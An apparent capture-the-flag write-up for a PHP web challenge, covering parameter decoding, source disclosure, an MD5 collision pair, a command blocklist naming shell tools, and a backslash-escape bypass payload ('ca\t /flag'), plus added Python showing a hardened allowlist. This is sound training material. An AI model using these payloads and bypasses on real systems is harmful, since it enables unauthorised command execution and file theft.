<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>The challenge opens at ?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= ; at the same time I viewed the page source.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>There is an "MD5 is funny" here, which suggests the challenge most likely has to do with MD5.</p>
<p>Then I captured the request; there was nothing special in the headers, so I tried starting from the URL.</p>
<p>First, base64-decode that img value once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>After one round of decoding it still looks like base64, so I decoded it again.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Then hex-decoding that gives</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>Encode index.php the same way (in reverse: hex, then base64 twice)</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
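<p>The encoding chain the writeup walks through above (base64 twice, then hex, for the img value, and the reverse to build the index.php value), as an added Python example that is not part of the original post. It also models the file-name filter and the flag check from the server source the post decodes further down, so the reader can see which names pass them. The helper _b64decode_lenient restores the '=' padding that the URL value is missing, since PHP's base64_decode tolerates that and Python's does not. All function names are mine.</p>

```python
import base64
import binascii
import re

# Character filter and flag check modelled on the server source shown in the writeup.
FILE_FILTER = re.compile(r"[^a-zA-Z0-9.]+")
FLAG_CHECK = re.compile(r"flag", re.IGNORECASE)


def _b64decode_lenient(data: str) -> bytes:
    """PHP's base64_decode tolerates missing '=' padding (the img value in the
    challenge URL arrives without it); Python's does not, so restore it first."""
    data = data.strip()
    return base64.b64decode(data + "=" * (-len(data) % 4))


def decode_img(img: str) -> str:
    """Undo the chain the post describes: base64 -> base64 -> hex -> filename."""
    once = _b64decode_lenient(img)
    twice = _b64decode_lenient(once.decode("ascii"))
    return binascii.unhexlify(twice).decode("ascii")


def encode_img(filename: str) -> str:
    """The reverse chain, used to build an img value for a given filename."""
    hexed = binascii.hexlify(filename.encode("ascii"))
    once = base64.b64encode(hexed)
    return base64.b64encode(once).decode("ascii")


def server_resolve(img: str):
    """What the page's server source does with img: keep only letters, digits
    and dots, then refuse any name containing 'flag' (case-insensitive).
    Returns the filename it would pass to file_get_contents, or None."""
    name = FILE_FILTER.sub("", decode_img(img))
    if FLAG_CHECK.search(name):
        return None
    return name


if __name__ == "__main__":
    print(decode_img("TXpVek5UTTFNbVUzTURabE5qYz0"))   # 555.png
    print(encode_img("index.php"))                      # TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
```

<p>Run it directly to print the two values from the post. Note that the filter strips everything but letters, digits and dots before the name reaches file_get_contents, and the only other guard in front of that call is the case-insensitive /flag check.</p>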
<p>Then enter it in the address bar.</p>
<p>Then view the source and decode the base64 string found in it:</p>
<div class="cnblogs_code">
<pre><?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// img: base64 -> base64 -> hex -> file name
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

// only letters, digits and dots survive; names containing "flag" are refused
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
// blocklist for cmd: command names plus shell metacharacters
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // a and b must differ as strings but share an MD5 digest
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
    body{
        background:url(./bj.png) no-repeat center center;
        background-size:cover;
        background-attachment:fixed;
        background-color:#CCCCCC;
    }
</style>
<body>
</body>
</html></pre>
</div>
<p>Combined with the earlier inference, the key code is:</p>
<div class="cnblogs_code">
<pre>if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
    echo `$cmd`;
} else {
    echo ("md5 is funny ~");
}</pre>
</div>
<p>This kind of MD5 check requires an MD5 strong collision (two different strings with the same MD5):</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>Just this is enough to have the content of cmd treated as a command.</p>
<p>So I used this payload:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>Because '\' is not blocked, it can be bypassed like this:</p>
<p>ls and l\s produce the same result when the command is executed.</p>
<p>I then found /flag in the root directory.</p>
<p>So the payload:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
</pre>
</div>
<p>For this challenge, since sort and dir are not blocked, dir can also be used instead of ls to list files, and sort instead of cat.</p>
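<p>The post's observation that the command blocklist misses ca\t and does not list sort or dir, worked through as an added Python example (not code from the post). The command words are copied from the regex in the decoded source, the symbol part of that regex is left out, and the check is repeated on the string after shell-style unescaping with shlex, which makes ca\t and cat identical to it, beside a hardened allowlist version. BLOCKED_WORDS comes from the page's regex; ALLOWED and its two entries are assumptions of this example.</p>

```python
import re
import shlex

# Command names from the blocklist in the page's server source (the symbol part
# of that regex is omitted; only the word list is needed for this demonstration).
BLOCKED_WORDS = ("ls", "bash", "tac", "nl", "more", "less", "head", "wget", "tail",
                 "vi", "cat", "od", "grep", "sed", "bzmore", "bzless", "pcre",
                 "paste", "diff", "file", "echo", "sh")
BLOCKLIST = re.compile("|".join(BLOCKED_WORDS), re.IGNORECASE)

# Hypothetical allowlist for a hardened version: fixed programs, each with a
# regex its argument string must match. These entries are assumptions, not from the page.
ALLOWED = {"uptime": re.compile(r"^$"), "date": re.compile(r"^$")}


def naive_blocklist_allows(cmd: str) -> bool:
    """The page's approach: reject when any blocked word appears in the raw string."""
    return BLOCKLIST.search(cmd) is None


def canonical(cmd: str) -> str:
    """Interpret the string the way the shell will (backslash escapes and quotes
    removed, whitespace normalised) so 'ca\\t' and 'cat' look the same to a check."""
    try:
        return " ".join(shlex.split(cmd))
    except ValueError:  # unbalanced quotes: leave the string as it is
        return cmd


def canonical_blocklist_allows(cmd: str) -> bool:
    """Same blocklist, but applied after canonicalisation."""
    return BLOCKLIST.search(canonical(cmd)) is None


def allowlist_allows(cmd: str) -> bool:
    """Hardened: only known programs with validated argument shapes. The raw
    string is never handed to a shell; only the split words would be executed."""
    try:
        words = shlex.split(cmd)
    except ValueError:
        return False
    if not words or words[0] not in ALLOWED:
        return False
    return ALLOWED[words[0]].match(" ".join(words[1:])) is not None


if __name__ == "__main__":
    for sample in ("cat /flag", r"ca\t /flag", "sort /flag", "dir /", "uptime"):
        print(f"{sample!r:16} naive={naive_blocklist_allows(sample)} "
              f"canonical={canonical_blocklist_allows(sample)} "
              f"allowlist={allowlist_allows(sample)}")
```

<p>Canonicalising before matching only closes the escape trick the post shows; a blocklist still cannot enumerate every program on the box (sort and dir pass both blocklist variants here), so the allowlist form, which never hands the string to a shell, is what a reviewer would ask for.</p>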